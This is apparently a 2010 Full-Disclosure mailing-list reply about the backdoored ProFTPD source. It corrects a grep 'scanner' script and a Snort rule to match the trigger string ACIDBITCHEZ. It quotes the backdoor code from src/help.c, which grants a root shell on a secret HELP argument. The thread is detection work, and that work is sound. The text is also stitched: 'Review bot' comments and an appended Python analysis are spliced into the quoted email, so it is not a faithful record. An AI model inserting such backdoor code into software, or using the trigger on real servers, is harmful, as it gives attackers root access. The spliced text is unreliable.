Hi,

You might want to make the below patch:

========
@@ -9,7 +9,7 @@
 # online store.
 #
 # 50% of all proceeds will go to the victims that have been
-# owned by ACIDBITCHES within the past 6 years.
+# owned by ACIDBITCHEZ within the past 6 years.
 #
 ###################################################################
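Review bot: the corrected comment now agrees with the strcmp(target, "ACIDBITCHEZ") literal quoted from src/help.c, but nothing in the comment says where that string was taken from; add a one-line reference to src/help.c beside it so the next person auditing the script checks the literal against the source rather than against the Snort rule, which spells it differently.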
@@ -17,4 +17,4 @@
 export PATH=/bin
-grep -r ACIDBITCHES *
+grep -r ACIDBITCHEZ *
====

The Snort rule you link to is checking for "HELP ACIDBITCHES", I believe
incorrectly, as the compromised code actually appears to trigger on the
string "ACIDBITCHEZ".

Snort sig (...BITCHES,
http://permalink.gmane.org/gmane.comp.security.ids.snort.emerging-sigs/7965)

""
alert tcp any any -> $HOME_NET 21 (msg:"ET CURRENT_EVENTS ProFTPD Backdoor Inbound Backdoor Open Request (ACIDBITCHES)"; flow:established,to_server; content:"HELP ACIDBITCHES"; depth:16; nocase; classtype: trojan-activity;
""

The compromise (...BITCHEZ,
http://xorl.wordpress.com/2010/12/02/news-proftpd-owned-and-backdoored/,
http://permalink.gmane.org/gmane.mail.postfix.user/215431) includes in
src/help.c:

""
  } else if (strcmp(target, "ACIDBITCHEZ") == 0) {
    setuid(0);
    setgid(0);
    system("/bin/sh;/sbin/sh");
  }

  /* List the syntax for the given target command. */
""

Thanks!

On Thu, Dec 2, 2010 at 10:18 AM, <[email protected]> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Esteemed members of the Full Disclosure mailing list,
>
> In the wake of the recent compromise of the ProFTPd distribution
> server and the subsequent root-level backdoor that was placed into
> the source[0], we are proud to announce a cutting edge source code
> scanner that will help you detect backdoors in your code. This code
> is free to use for 30 days, after which time you must pay for it.
>
>
> - ------------- el8 Vuln Scan v.0.1 -------------
>
> #!/bin/bash
>
> ###################################################################
> #
> # Place this script inside the top level directory of your
> # source code repo.
> #
> # Please delete this after 30 days, or purchase a copy from our
> # online store.
> #
> # 50% of all proceeds will go to the victims that have been
> # owned by ACIDBITCHES within the past 6 years.
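Review bot: `grep -r ACIDBITCHEZ *` still misses dotfiles and dot-directories, because the shell glob `*` does not expand them; `grep -r ACIDBITCHEZ .` searches the whole tree. Keeping the match case-sensitive is correct here, since the quoted src/help.c uses strcmp(), an exact comparison, unlike the Snort rule's nocase. Note also that the surrounding `export PATH=/bin` will break the script on systems where grep is installed under /usr/bin.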
> #
> ###################################################################
>
> # main
>
> export PATH=/bin
>
> grep -r ACIDBITCHES *
>
> - ------------- el8 Vuln Scan v.0.1 -------------
>
>
> Thank you for helping us to help you make the Internet a safer
> place.
>
>
> [0]
> http://permalink.gmane.org/gmane.comp.security.ids.snort.emerging-sigs/7965
> -----BEGIN PGP SIGNATURE-----
> Charset: UTF8
> Version: Hush 3.0
> Note: This signature can be verified at https://www.hushtools.com/verify
>
> wpwEAQMCAAYFAkz34wkACgkQnCf21LwRaXbdlwP/bRK2S7SA77h05jF1cdBty4hefooL
> Zx0GOeABoqTZKnaNuKxGqwdPtg7fyNctrb7iMzehzJWBXnAD1Zik2UCujZINxeE8BFhw
> yTN9gshJZB1cdWSHwxQdiB+NqS9eRqg3s0J8i/9EjzNVkgX4EJTJZMXv9oEUDCgwW92h
> 7KFZMWU=
> =mJJI
> -----END PGP SIGNATURE-----
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
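The rule mismatch discussed in the reply, as an added example that is not part of this thread: a small Python model of the Snort content/depth/nocase match and of the strcmp() check quoted from src/help.c, run over constructed FTP command lines to show which inputs the posted rule misses and which the corrected literal catches. It assumes that `target` in src/help.c is the single argument of an FTP HELP command.

```python
"""Added example, not from the thread: model the quoted Snort content match
and the quoted strcmp() check, then compare them on constructed inputs."""
from dataclasses import dataclass
from typing import Optional

@dataclass(frozen=True)
class ContentMatch:
    """Subset of Snort content-option semantics used by the posted rule:
    content is a literal, depth limits the search to the first N payload
    bytes, nocase makes the comparison case-insensitive."""
    content: bytes
    depth: Optional[int] = None
    nocase: bool = False

    def matches(self, payload: bytes) -> bool:
        window = payload if self.depth is None else payload[:self.depth]
        needle = self.content
        if self.nocase:
            window, needle = window.lower(), needle.lower()
        return needle in window

# The rule as posted (sig 7965) and the same rule with the corrected literal.
POSTED_RULE = ContentMatch(b"HELP ACIDBITCHES", depth=16, nocase=True)
CORRECTED_RULE = ContentMatch(b"HELP ACIDBITCHEZ", depth=16, nocase=True)

def backdoor_would_trigger(command_line: bytes) -> bool:
    """Mirror strcmp(target, "ACIDBITCHEZ") == 0 from the quoted src/help.c.
    Assumption: target is the single argument of an FTP HELP command."""
    parts = command_line.rstrip(b"\r\n").split(b" ", 1)
    return len(parts) == 2 and parts[0] == b"HELP" and parts[1] == b"ACIDBITCHEZ"

# Constructed sample command lines, not captured traffic.
SAMPLES = [
    b"HELP ACIDBITCHEZ\r\n",  # the literal the backdoor actually compares against
    b"HELP ACIDBITCHES\r\n",  # the literal the posted rule looks for
    b"help acidbitchez\r\n",  # nocase rule fires, exact strcmp() does not
    b"HELP SITE\r\n",         # ordinary HELP request
]

def coverage_gap(rule: ContentMatch, samples=SAMPLES) -> list:
    """Command lines that reach the backdoor branch but the rule does not flag."""
    return [s for s in samples if backdoor_would_trigger(s) and not rule.matches(s)]

def false_alarms(rule: ContentMatch, samples=SAMPLES) -> list:
    """Command lines the rule flags that would not satisfy the strcmp() check."""
    return [s for s in samples if rule.matches(s) and not backdoor_would_trigger(s)]

if __name__ == "__main__":
    for name, rule in (("posted", POSTED_RULE), ("corrected", CORRECTED_RULE)):
        print(f"{name}: misses {coverage_gap(rule)}, extra {false_alarms(rule)}")
```

With depth:16 and a 16-byte content, the match can only succeed at offset 0 of the payload, which is why the model also rejects a command line that has anything in front of HELP.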
